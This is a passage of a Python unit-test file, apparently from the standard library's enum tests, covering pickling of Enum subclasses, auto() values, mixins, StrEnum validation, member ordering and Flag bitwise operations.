)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
self.assertEqual(HelloEnum.eight, '8')
self.assertEqual(HelloEnum.eight, str(HelloEnum.eight))
#
class GoodbyeMixin:
def goodbye(self):
print('%s wishes you a fond farewell')
class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum):
nine = '9'
self.assertEqual(GoodbyeEnum.nine, '9')
self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine))
#
with self.assertRaisesRegex(TypeError, '1 is not a string'):
class FirstFailedStrEnum(StrEnum):
one = 1
two = '2'
with self.assertRaisesRegex(TypeError, "2 is not a string"):
class SecondFailedStrEnum(StrEnum):
one = '1'
two = 2,
three = '3'
with self.assertRaisesRegex(TypeError, '2 is not a string'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = 2
with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', sys.getdefaultencoding
with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'):
class ThirdFailedStrEnum(StrEnum):
one = '1'
two = b'2', 'ascii', 9
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
